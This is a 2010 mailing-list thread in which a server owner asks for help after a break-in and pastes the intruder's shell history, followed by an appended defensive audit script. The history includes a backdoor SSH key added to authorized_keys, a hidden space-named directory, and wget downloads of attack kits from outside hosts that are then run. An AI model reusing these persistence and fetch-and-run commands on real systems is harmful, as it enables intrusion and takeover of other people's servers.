help
Joy Methew
ml4joy at gmail.com
Thu Jan 28 06:30:08 UTC 2010
I use PuTTY for remote login.
On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy at gmail.com> wrote:
> Still I am thinking, how did he/she get my password??
>
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> I have changed my root password.
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <
>> Wahyu.Darmawan at ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list-bounces at redhat.com] On
>>> Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL5.3 as my mail server with a real IP. I
>>> configure my system mostly remotely. The last login time of my system was
>>> 27 Jan from this IP 118.129.153.43.
>>> Then I tried to log in on 28 Jan in the morning, and I couldn't get
>>> authenticated as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root, then I ran the "last" command. I am sending the first
>>> 10 lines of the last command... I think someone hacked my system. I am
>>> sending the history command output.
>>> Now I removed the .ssh directory and /var/tmp/*
>>>
>>> Please suggest what this is??
>>>
>>> thanks
>>>
>>> last command output:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>>
>>> What is 165.red-79........ this is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600
>>> ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>>
>>
>>
>
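
A check for the two persistence artifacts visible in the history output above (a key appended to `~/.ssh/authorized_keys` and a directory named `" "` under `/var/tmp`), run against every account rather than only root. This is an added example, not part of the original thread: the function names and the allowlist file of approved public keys are assumptions, and matching dot-only directory names goes beyond the single-space name shown in the thread.

```shell
#!/bin/sh
# Added example: audit for the persistence artifacts seen in the history output.

# unknown_keys FILE ALLOWLIST
# Prints "FILE:LINE<TAB>type<TAB>comment" for every key in FILE whose base64
# body is absent from ALLOWLIST (approved keys, in authorized_keys format).
unknown_keys() {
    awk '
        function keyfield(   i) {   # key-type field; options may precede it
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) return i
            return 0
        }
        /^[ \t]*(#|$)/ { next }                          # comments, blank lines
        { k = keyfield(); if (!k) next }                 # not a key line
        FILENAME == ARGV[1] { ok[$(k + 1)] = 1; next }   # load the allowlist
        !(($(k + 1)) in ok) { print FILENAME ":" FNR "\t" $k "\t" $(k + 2) }
    ' "$2" "$1"
}

# hidden_named_dirs ROOT...
# Lists directories whose names consist only of spaces and/or dots, such as
# the " " directory created under /var/tmp in the history above.
hidden_named_dirs() {
    find "$@" -xdev -mindepth 1 -type d ! -name '*[!. ]*' -print 2>/dev/null
}

# audit_all ALLOWLIST
# Checks every account home listed in /etc/passwd, including the legacy
# authorized_keys2 file name, then the world-writable temp directories.
audit_all() {
    while IFS=: read -r user pw uid gid gecos home shell; do
        for f in "$home/.ssh/authorized_keys" "$home/.ssh/authorized_keys2"; do
            if [ -f "$f" ]; then unknown_keys "$f" "$1"; fi
        done
    done < /etc/passwd
    hidden_named_dirs /tmp /var/tmp /dev/shm
}

# Usage (as root; the allowlist path is a placeholder):
#   audit_all /root/approved_keys.pub
```

Any line printed is a key or directory to investigate before trusting the host again; an empty allowlist reports every installed key.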